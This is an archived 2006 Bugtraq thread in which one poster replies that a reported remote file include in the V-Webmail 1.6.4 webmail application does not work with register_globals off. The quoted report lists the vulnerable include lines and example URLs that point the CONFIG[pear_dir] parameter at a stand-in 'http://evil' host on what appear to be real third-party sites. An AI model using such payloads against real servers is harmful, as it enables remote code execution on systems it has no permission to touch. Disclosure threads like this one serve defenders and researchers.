lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Tue, 30 May 2006 11:39:04 +0300 From: "Ventsislav Genchev" <vigour1@...il.com> To: bugs@...uritytracker.com, bugtraq@...urityfocus.com, submit@...w0rm.com Subject: Re: V-Webmail 1.6.4 Remote File Include Tested with register_globals = Off ... no affect.. Regards, Ventsi On 5/25/06, beford <xbefordx@...il.com> wrote: > Script: V-Webmail 1.6.4 > Vendor: http://www.v-webmail.org/ > Description: V-webmail is a powerful PHP based webmail application with an > abundance of features, including many innovative ideas for web applications > Discovered: beford <xbefordx gmail com> > Vulnerable File > > v-webmail/includes/pear/*/*.php => require_once ($CONFIG['pear_dir'] . '*.php'); > v-webmail/includes/mailaccess/pop3.php => > require_once($CONFIG['pear_dir'] . 'Net/POP3.php'); > > Version 1.3 > http://www.site.th/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil > http://www.woot.com.kh/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil > > Version 1.5 - 1.6.4 > http://something.ie/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://evil >
Powered by blists - more mailing lists